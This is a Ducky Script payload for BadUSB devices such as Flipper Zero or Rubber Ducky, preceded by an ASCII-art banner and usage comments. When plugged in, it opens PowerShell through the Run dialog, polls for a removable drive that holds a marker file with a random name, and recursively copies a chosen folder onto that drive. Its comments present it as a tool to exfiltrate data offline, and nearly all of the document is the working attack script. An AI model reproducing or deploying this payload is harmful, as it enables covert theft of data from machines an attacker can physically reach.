REM                                                                    _..._       .-'''-.                 .-'''-.
REM                                                                 .-'_..._''.   '   _    \  .---.       '   _    \
REM /|                                                            .' .'      '.\/   /` '.   \ |   |.--. /   /` '.   \
REM ||    .-.          .-                                        / .'          .   |     \  ' |   ||__|.   |     \  '
REM ||     \ \        / /                               .-,.--. . '            |   '      |  '|   |.--.|   '      |  '
REM ||  __  \ \      / /                          __    |  .-. || |            \    \     / / |   ||  |\    \     / /
REM ||/'__ '.\ \    / /            .--------.  .:--.'.  | |  | || |             `.   ` ..' /  |   ||  | `.   ` ..' /
REM |:/`  '. '\ \  / /             |____    | / |   \ | | |  | |. '                '-...-'`   |   ||  |    '-...-'`
REM ||     | | \ `  /                  /   /  `" __ | | | |  '-  \ '.          .              |   ||  |
REM ||\    / '  \  /                 .'   /    .'.''| | | |       '. `._____.-'/              |   ||__|
REM |/\'..' /   / /                 /    /___ / /   | |_| |         `-.______ /               '---'
REM '  `'-'`|`-' /                 |         |\ \._,\ '/|_|                  `
REM          '..'                  |_________| `--'  `"

REM Do you want BadUSB / Ducky Script to exfill data from a machine but not online?
REM This script tests all removable drive root directories for a certain file with a random file name.
REM IF this file is detected, this means this drive is the removable you're using to exfill data to.
REM How to use this script?
REM Copy this Ducky script to your Flipper Zero or Rubber Ducky, generate a file with a random file name
REM and change the value of $MaxDuration, $CopyFrom, $CopyTo and $FindMe below accordingly.

DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRING $MaxDuration = 180
ENTER
ALTCODE $CopyFrom = "C:\Windows"
ENTER
ALTCODE $CopyTo = "copy"
ENTER
ALTCODE $FindMe = "gfhnubkw.txt"
ENTER
STRING $f = $false
ENTER
STRING $startTime = Get-Date
ENTER
STRING while ((New-TimeSpan -Start $startTime).TotalSeconds -lt $MaxDuration -and -not $f) {
ENTER
STRING $d = Get-WmiObject -Class Win32_Volume | Where-Object { $_.DriveType -eq 2 }
ENTER
STRING foreach ($e in $d) {
ENTER
STRING $p = Join-Path -Path $e.Name -ChildPath $FindMe
ENTER
STRING if (Test-Path $p) {
ENTER
STRING $f = $true
ENTER
STRING $partition = Get-Partition | Where-Object { $_.DriveLetter -eq $e.DriveLetter }
ENTER
STRING $totalSize = 0
ENTER
STRING $files = Get-ChildItem $CopyFrom -File -Recurse -ErrorAction SilentlyContinue
ENTER
STRING foreach ($file in $files) {
ENTER
STRING $totalSize += $file.Length}
ENTER
STRING if ($totalSize -lt 1GB) {
ENTER
ALTCODE $totalSizeFormatted = "$([Math]::Round($totalSize / 1MB, 1)) MB"}
ENTER
STRING else {
ENTER
ALTCODE $totalSizeFormatted = "$([Math]::Round($totalSize / 1GB, 1)) GB"}
ENTER
ALTCODE Write-Host "Copying... $totalSizeFormatted to $($e.DriveLetter)"
ENTER
ALTCODE $Destination = "$($e.Name)\$CopyTo"
ENTER
STRING Copy-Item -Path $CopyFrom -Destination $Destination -Recurse -ErrorAction SilentlyContinue
ENTER
STRING Exit}
ENTER
STRING break}}
ENTER
